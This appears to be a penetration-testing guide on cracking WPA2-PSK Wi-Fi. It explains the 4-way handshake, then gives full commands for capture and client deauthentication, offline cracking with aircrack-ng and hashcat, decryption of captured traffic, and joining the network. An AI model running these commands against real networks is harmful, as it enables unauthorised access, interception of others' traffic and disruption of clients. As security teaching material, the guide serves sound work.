
Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

WPA2-PSK authentication uses a 4-way handshake to derive per-session keys (the PTK) from the pre-shared key. The passphrase itself is never transmitted: the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), the PTK is derived from the PMK together with both MAC addresses and the two nonces exchanged in the handshake, and each side proves it holds the PTK with a MIC over the EAPOL-Key messages. Everything needed to recompute that MIC is present in the captured frames except the passphrase, so a capture of the handshake is enough to test candidate passphrases offline. By forcing a client to reconnect (deauth attack), a fresh handshake can be captured and then cracked against a wordlist. No active session or decryption of live traffic is needed, only the captured handshake file. The attack only succeeds if the passphrase is in the wordlist (or within reach of hashcat rules or masks); a long random passphrase is out of reach regardless of hardware.

Cracking WPA2

1. Find the WPA2 Network

Put the card in monitor mode first (the wlan0mon interface that airmon-ng creates is the one used below), then scan all bands to identify the target:
sudo airodump-ng --band abg <WIFI-INTERFACE>
Note the target's BSSID, its channel, and whether any client stations (STATION column) are associated; the deauth step needs at least one connected client.

2. Focus on Target Network

Capture traffic on the target's channel and write it to file:
sudo airodump-ng -w wpa2-capture --bssid <BSSID> --channel <CHANNEL> <WIFI-INTERFACE>
Keep this running. airodump-ng appends a counter to the prefix (wpa2-capture-01.cap), and the handshake is captured when a client connects or reconnects. Locking the channel matters: all four messages have to be seen on one channel, which does not happen while airodump-ng is hopping.

3. Deauthenticate a Client

Force a connected client to disconnect and trigger a new handshake (the interface must be on the target's channel, so run this alongside the capture above):
sudo aireplay-ng -0 5 -c <CLIENT-MAC> -a <BSSID> <WIFI-INTERFACE>
-0 5 sends five deauthentication bursts; -0 0 keeps sending them until stopped. Omitting -c broadcasts the deauth to every client, which needs no client MAC but is noisier. airodump-ng will display WPA handshake: <BSSID> in the top right when captured. If the network enforces 802.11w (protected management frames), unauthenticated deauth frames are ignored and you have to wait for a natural reconnect. Deauthentication is disruptive and easily logged by a wireless IDS, so keep it to authorised engagements.

4. Crack the Handshake

Run a dictionary attack with aircrack-ng (add -b <BSSID> if the capture contains more than one network):
sudo aircrack-ng -w <WORDLIST> wpa2-capture-01.cap
Or with hashcat (mode 22000, recommended). hcxpcapngtool converts the EAPOL messages (and any PMKIDs) in the capture to the 22000 hash format, which hashcat mode 22000 handles in one run:
hcxpcapngtool wpa2-capture-01.cap -o hash.22000
hashcat -a 0 -m 22000 hash.22000 <WORDLIST>
-a 0 is straight dictionary mode. --force only suppresses hashcat's driver and device warnings and should not be part of a routine command line. Once a candidate matches, hashcat -m 22000 hash.22000 --show prints the result from the potfile. Each candidate costs 4096 PBKDF2 rounds, so a GPU is what makes large wordlists practical.
Common wordlists: /usr/share/wordlists/rockyou.txt

Decrypt Captured Traffic (airdecap-ng)

With the handshake and the cracked password, decrypt all post-handshake traffic to inspect plaintext communications:
airdecap-ng -e <SSID> -p <PASSWORD> wpa2-capture-01.cap
Writes a new file wpa2-capture-01-dec.cap (add -b <BSSID> to restrict decryption to one network). Open it in Wireshark to inspect HTTP, DNS, and other traffic from connected clients. Because every client has its own PTK, airdecap-ng can only decrypt the traffic of clients whose 4-way handshake is in the capture; traffic from a client that associated before the capture started stays encrypted until that client reconnects.

WPA2 Connection

wpa_supplicant config (e.g. /tmp/client.conf):
network={
    ssid="SSID"
    psk="password"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}
scan_ssid=1 makes wpa_supplicant probe for the SSID directly, which is needed for hidden networks; proto=WPA2 (alias RSN) excludes WPA1. psk can also be given as the 64-hex-digit PMK printed by wpa_passphrase, so the plaintext passphrase does not sit in the file.
Connect (first return the card to managed mode so wlan0 exists again):
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -i wlan0 -c /tmp/client.conf
wpa_supplicant stays in the foreground and logs the association; add -B to run it in the background.
Get an IP address:
sudo dhclient wlan0 -v